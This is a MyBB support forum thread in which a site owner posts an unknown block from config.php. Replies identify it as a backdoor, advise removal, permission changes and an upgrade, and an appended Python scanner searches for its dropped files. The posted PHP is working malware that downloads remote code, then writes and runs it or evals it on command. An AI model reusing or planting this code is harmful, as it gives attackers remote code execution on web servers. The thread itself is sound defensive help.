MyBB Community Forums

Full Version: config.php
I found the following code starting on line 2119 and ending on line 2141 in my config.php file. Should it be there, and what does it do?

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == 'ee188463935a061dee6df8bf449cb882'){
        if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
}}
Delete it immediately! It is common malicious code found in config.php. Because you are done with installation, chmod config.php to 444 after removing the malicious code.
Are you running version 1.6.5? If not, you should upgrade. If you are on 1.6.4, make sure you have patched the 1.6.4 security vulnerability. IIRC, it is related to this exploit. http://blog.mybb.com/2011/10/06/1-6-4-se...nerabilit/
Run file verification in the ACP too.
Deleted, what does it do?
That's not normal. Delete it immediately.

It should look somewhat like this: [wiki]inc/config.php[/wiki]

Also, run File Verification on your ACP>Tools & Maintenance.

EDIT: It's a malicious script. It seems to save a file to your server. Check your folders for a file with a name that's a jumble of letters and numbers.
(2012-01-15, 03:12 AM) markwesley wrote: Deleted, what does it do?

It is exploit code. I don't remember exactly, but it has to do with a cURL request to a malicious web page, I think.
File verification returns normal, no corrupt files. I'll check it in the morning; it's gone 3am here and I'm tired.
I could PM someone User details if they want to take a look?
As long as that code is removed, file verification returns normal, and you are at mybb 1.6.5, you should be okay.
Make sure config.php is CHMODded to 444. It will need 644 on upgrade, but not until then.
I don't understand what you're saying. I'm tired, I've looked for a weird file and can't see one.
File verification won't show anything because it doesn't change other files, it creates a new one. You'll need to go through your files via FTP or cPanel file manager.
You could also check your site through Sucuri: http://sitecheck.sucuri.net/scanner/

CHMOD inc/config.php to 444.
Are you running MyBB 1.6.5? Because there was a 1.6.4 exploit in index.php that allowed modification of files such as config.php.
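
Added example, not part of the original thread: the posted snippet names its downloaded file `md5(rand(0,100)).'.php'`, so only 101 file names are possible and they can be searched for directly instead of by eye. The script below (the function name `scan` is this example's own) walks a directory tree for those names and for PHP files containing strings from the posted snippet. It assumes PHP hashes the decimal string of the random integer and that the file may land in any directory under the forum root.

```python
import hashlib
import os
import sys

# The snippet writes to md5(rand(0,100)).'.php': md5 of "0".."100", 101 names in total.
DROPPED_NAMES = {hashlib.md5(str(n).encode()).hexdigest() + ".php" for n in range(101)}

# Strings copied from the snippet posted in this thread.
BACKDOOR_MARKERS = (b"$_GET['pingnow']", b"eval($re)")


def scan(root):
    """Return (dropped_files, infected_files) found anywhere under root."""
    dropped, infected = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            # A file whose name is one of the 101 candidates is suspect regardless of content.
            if name.lower() in DROPPED_NAMES:
                dropped.append(path)
            # Any PHP file carrying the snippet's strings still has the backdoor in it.
            if name.lower().endswith(".php"):
                try:
                    with open(path, "rb") as fh:
                        data = fh.read()
                except OSError:
                    continue  # unreadable file: skip it and keep scanning
                if any(marker in data for marker in BACKDOOR_MARKERS):
                    infected.append(path)
    return sorted(dropped), sorted(infected)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    dropped, infected = scan(root)
    for p in dropped:
        print("possible dropped file:", p)
    for p in infected:
        print("backdoor marker found:", p)
    sys.exit(1 if dropped or infected else 0)
```

Run it with the forum's root directory as the argument. The `eval` branch of the snippet writes nothing to disk, so an empty result does not show that the backdoor was never used.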